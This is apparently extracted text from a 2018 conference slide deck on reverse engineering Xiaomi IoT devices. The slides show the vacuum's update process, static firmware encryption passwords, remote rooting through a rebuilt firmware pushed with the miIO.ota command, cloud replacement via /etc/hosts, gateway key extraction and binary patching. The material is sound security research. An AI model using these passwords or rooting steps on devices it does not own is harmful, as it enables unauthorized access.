![Page 57: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/57.jpg)
57ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Activecopy
![Page 58: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/58.jpg)
58ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
MD5 ok?
Activecopy
![Page 59: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/59.jpg)
59ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Decrypt + image OK?
Activecopy
![Page 60: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/60.jpg)
60ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
DataUnpack + dd
Activecopy
![Page 61: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/61.jpg)
61ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Activecopy
Update root pwin /etc/shadow
![Page 62: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/62.jpg)
62ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
dd
Activecopy
![Page 63: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/63.jpg)
63ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Activecopy
rebooting…
![Page 64: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/64.jpg)
64ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Activecopy
rebooting…
![Page 65: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/65.jpg)
65ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Activecopy
dd
![Page 66: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/66.jpg)
66ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Update processsystem_a
system_b
Download
Data
Activecopy
![Page 67: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/67.jpg)
67ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Firmware updates
• Full and partial images– Encrypted tar.gz archives– Full image contains disk.img
• 512 Mbyte ext4-filesystem
• Encryption– Static password: “rockrobo”– Ccrypt [256-bit Rijndael encryption (AES)]
• Integrity– MD5 provided by cloud
![Page 68: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/68.jpg)
68ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Firmware updates
• Full and partial images– Encrypted tar.gz archives– Full image contains disk.img
• 512 Mbyte ext4-filesystem
• Encryption– Static password: “rockrobo”– Ccrypt [256-bit Rijndael encryption (AES)]
• Integrity– MD5 provided by cloud
Sound PackagesStatic password: “r0ckrobo#23456”
![Page 69: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/69.jpg)
69ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
![Page 70: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/70.jpg)
70ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Lets root remotely
• Preparation: Rebuild Firmware
– Include authorized_keys
– Remove iptables rule for sshd
• Send „miIO.ota“ command to vacuum
– Encrypted with token
• From app or unprovisioned state
– Pointing to own http server
![Page 71: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/71.jpg)
71ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Lets root remotely
unprovisioned state
Webserver
![Page 72: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/72.jpg)
72ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Lets root remotely
unprovisioned state
„Get Token“
Webserver
![Page 73: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/73.jpg)
73ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Lets root remotely
unprovisioned state
„Get Token“
Webserver
![Page 74: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/74.jpg)
74ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Lets root remotely
„miIO.ota“
unprovisioned state
„Get Token“
Webserver
![Page 75: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/75.jpg)
75ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Lets root remotely
„miIO.ota“
unprovisioned state
„Get Token“
Webserver
![Page 76: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/76.jpg)
76ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Lets root remotely
„miIO.ota“
„Get Token“
Webserver
![Page 77: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/77.jpg)
77ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
SSH
![Page 78: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/78.jpg)
78ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
![Page 79: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/79.jpg)
79ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
![Page 80: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/80.jpg)
80ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
![Page 81: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/81.jpg)
81ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
![Page 82: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/82.jpg)
82ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
![Page 83: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/83.jpg)
83ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Gain Independence
Two methods:
• Replacing the cloud interface
• Proxy cloud communication
Xiaomi Cloud
![Page 84: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/84.jpg)
84ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Robot intern
My cloud client
https, mqtt, etc…(local):54322 (tcp)
Replacing the cloud interface
Miio_client
0.0.0.0:54321 (udp)(local):54322 (tcp)
ot.io.mi.com:80(tcp)ott.io.mi.com:8053(udp)
*.fds.api.xiaomi.com (https)
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
Android/iPhone App
<-commands,reports->
player0.0.0.0:6665
RoboController
AppProxy
wifimgr
uart_mcuuart_ldscompass
![Page 85: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/85.jpg)
85ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Robot intern
Replacing the cloud interface
*.fds.api.xiaomi.com (https)
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
<-commands,reports->
player0.0.0.0:6665
RoboController
AppProxy
wifimgr
uart_mcuuart_ldscompass
![Page 86: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/86.jpg)
86ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Robot intern
My cloud client
https, mqtt, etc…(local):54322 (tcp)
Replacing the cloud interface
*.fds.api.xiaomi.com (https)
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
FHEMHome Assistant
<-commands,reports->
player0.0.0.0:6665
RoboController
AppProxy
wifimgr
uart_mcuuart_ldscompass
![Page 87: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/87.jpg)
87ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Robot intern
My cloud client
https, mqtt, etc…(local):54322 (tcp)
Replacing the cloud interface
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
FHEMHome Assistant
/etc/hosts
127.0.0.1 awsbj0...127.0.0.1 aswbj0-files…127.0.0.1 cdn.cnbj0….
<-commands,reports->
player0.0.0.0:6665
RoboController
AppProxy
wifimgr
uart_mcuuart_ldscompass
![Page 88: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/88.jpg)
88ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Robot intern
player0.0.0.0:6665
RoboController
AppProxy
wifimgr
uart_mcuuart_ldscompass
Proxy cloud communication
Miio_client
0.0.0.0:54321 (udp)(local):54322 (tcp)
ot.io.mi.com:80(tcp)ott.io.mi.com:8053(udp)
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
Android/iPhone App
*.fds.api.xiaomi.com (https)
<-commands,reports->
![Page 89: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/89.jpg)
89ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Robot intern
player0.0.0.0:6665
RoboController
AppProxy
wifimgr
uart_mcuuart_ldscompass
Proxy cloud communication
Miio_client
0.0.0.0:54321 (udp)(local):54322 (tcp)
ot.io.mi.com:80(tcp)ott.io.mi.com:8053(udp)
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
Android/iPhone App
*.fds.api.xiaomi.com (https)
<-commands,reports->
![Page 90: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/90.jpg)
90ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Robot intern
player0.0.0.0:6665
RoboController
AppProxy
wifimgr
uart_mcuuart_ldscompass
Proxy cloud communication
Miio_client
0.0.0.0:54321 (udp)(local):54322 (tcp)
ot.io.mi.com:80(tcp)ott.io.mi.com:8053(udp)
IPCplain json (tcp)enc(key) json (tcp/udp)enc(token) json (udp)
Android/iPhone App
/etc/hosts
130.83.x.x ot.io.mi.com 130.83.x.x ot.io.mi.com
Dustcloud
*.fds.api.xiaomi.com (https)
<-commands,reports->
![Page 91: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/91.jpg)
91ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Summary of the Vacuum
• Rooting
– Remote!
• Cloud Connection
– Run without cloud
– Run with your own cloud
• Our goal: We want the Cloudkeys!
![Page 92: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/92.jpg)
92ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
SMART HOME GATEWAY, LIGHTBULBS AND LED STRIPS
![Page 93: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/93.jpg)
93ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi Ecosystem
HTTPS
ZigBee
XiaomiCloud
Gateway
![Page 94: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/94.jpg)
94ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Xiaomi Ecosystem
HTTPS
ZigBee
XiaomiCloud
Gateway
![Page 95: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/95.jpg)
95ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Overview Hardware
• Application-MCU: Marvell 88MW30x– ARM Cortex-M4F @ 200 MHz– RAM: 512KByte SRAM– QSPI interface, supports XIP– Flash: 16 MByte (Gateway)
• 4 Mbyte SPI (LED Strip, Lightbulb)– Integrated 802.11b/g/n WiFi Core
• Zigbee-MCU: NXP JN5169 (Gateway only)– 32-bit RISC CPU– RAM: 32 kB– Flash: 512 kB embedded Flash, 4 kB EEPROM
![Page 96: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/96.jpg)
96ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Sensors connected via gateway
Zigbee (NXP JN5169) based• Door Sensor (Reed contact)• Temperature sensor• Power Plug• Motion Sensor• Button• Smoke Detector• Smart Door Lock• …
![Page 97: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/97.jpg)
97ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
• PCB got lots of testing points• SWD is enabled by default
Acquiring the Key
SDCLK SDIO
RST TX* GND RX*
We can get the keyfrom the memdump
*UART
![Page 98: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/98.jpg)
98ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Acquiring the Key
• Can we get the Key without a hardware attack?
• Firmware updates are not signed…
![Page 99: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/99.jpg)
99ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Acquiring the Key
• Can we get the Key without a hardware attack?
• Firmware updates are not signed…
![Page 100: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/100.jpg)
100ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Acquiring the Key
• Can we get the Key without a hardware attack?
• Firmware updates are not signed…
Lets create a modified firmwarewhich gives us the keyautomatically!
![Page 101: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/101.jpg)
101ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Acquiring the Key
• Can we get the Key without a hardware attack?
• Firmware updates are not signed…
No hardware access needed
Lets create a modified firmwarewhich gives us the keyautomatically!
![Page 102: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/102.jpg)
102ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Acquiring the Key
• Can we get the Key without a hardware attack?
• Firmware updates are not signed…
No hardware access needed
The lightbulb runs a bare-metal OS => we need to patch the binary
Lets create a modified firmwarewhich gives us the keyautomatically!
![Page 103: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/103.jpg)
103ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Goals
Original code
Branch: Original code
…
![Page 104: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/104.jpg)
104ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Goals
Original code
Branch: Original code
Patch code
…
![Page 105: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/105.jpg)
105ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Goals
Original code
Patch code
…
Branch: Patch code
![Page 106: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/106.jpg)
106ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Goals
Original code
Patch code
…
Branch: Patch code
![Page 107: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/107.jpg)
107ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Goals
• Modify program flow
• Add additional code
• Use existing functions
Original code
Patch code
…
Branch: Patch code
![Page 108: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/108.jpg)
108ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Why can it be hard?
• Overwrite branch instructionsNew Address = Value of PC + Offset (on ARM)
• Write new code in assembly
• Model address space (RAM / ROM / free space)
• Call existing functions
• Handle different firmware versions and devices
![Page 109: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/109.jpg)
109ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
definitions.mk
Prerequisite: Know memory layout
![Page 110: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/110.jpg)
110ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
definitions.mk
Prerequisite: Know memory layout
Original code
Branch: Original code
Patch code
…
![Page 111: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/111.jpg)
111ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
definitions.mk
Prerequisite: Know memory layout
Original code
Branch: Original code
Patch code
…
![Page 112: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/112.jpg)
112ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
definitions.mk
Prerequisite: Know memory layout
Original code
Branch: Original code
Patch code
…
![Page 113: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/113.jpg)
113ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
wrapper.c
Prerequisite: Know function names and signature
![Page 114: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/114.jpg)
114ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
Get function names:
main()
Compile Example Project with debug symbols
011010100011
vs
Use Bindiff to applyfunction names
Load binaryinto IDA
![Page 115: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/115.jpg)
115ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
Putting it all together: Write your patch code in Cpatch.c
![Page 116: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/116.jpg)
116ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
Putting it all together: Write your patch code in Cpatch.c
Original code
Branch: Original code
Patch code
…
![Page 117: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/117.jpg)
117ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Binary Patching: Nexmon Framework
Putting it all together: Write your patch code in Cpatch.c
Original code
Branch: Original code
Patch code
…
![Page 118: Reversing IoT: Xiaomi Ecosystem · Reversing IoT: Xiaomi Ecosystem Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)](https://reader031.fdocuments.net/reader031/viewer/2022020918/5f01daf17e708231d4015d23/html5/thumbnails/118.jpg)
118ReCon BRX 2018 – Dennis Giese, Daniel Wegemer
Preparing the modified binary (Marvell)
• Preliminary approach for lightbulbs SPI done by Uri Shaked*
• But SPI format != OTA format
* h
ttp
s://
ha
cker
no
on
.co
m/i
nsi
de-
the-
bu
lb-a
dve
ntu
res-
in-
reve
rse-
eng
inee
rin
g-s
ma
rt-b
ulb
-fir
mw
are
-1b
81
ce2
69
4a
6
Byte 0-3 4-7 8-11 12-15 16-19
Magic Magic Timestamp # of segments entry address
0x00000000 4D 52 56 4C 7B F1 9C 2E FF BE A8 59 03 00 00 00 19 37 00 1F
"MRVL" 0x1f003719
segment magic offset in file size of segment mem addr checksum
0x00000014 02 00 00 00 C8 00 00 00 50 36 00 00 00 00 10 00 20 C8 51 7D
0xc8 0x3650 0x100000
segment magic offset in file size of segment mem addr checksum
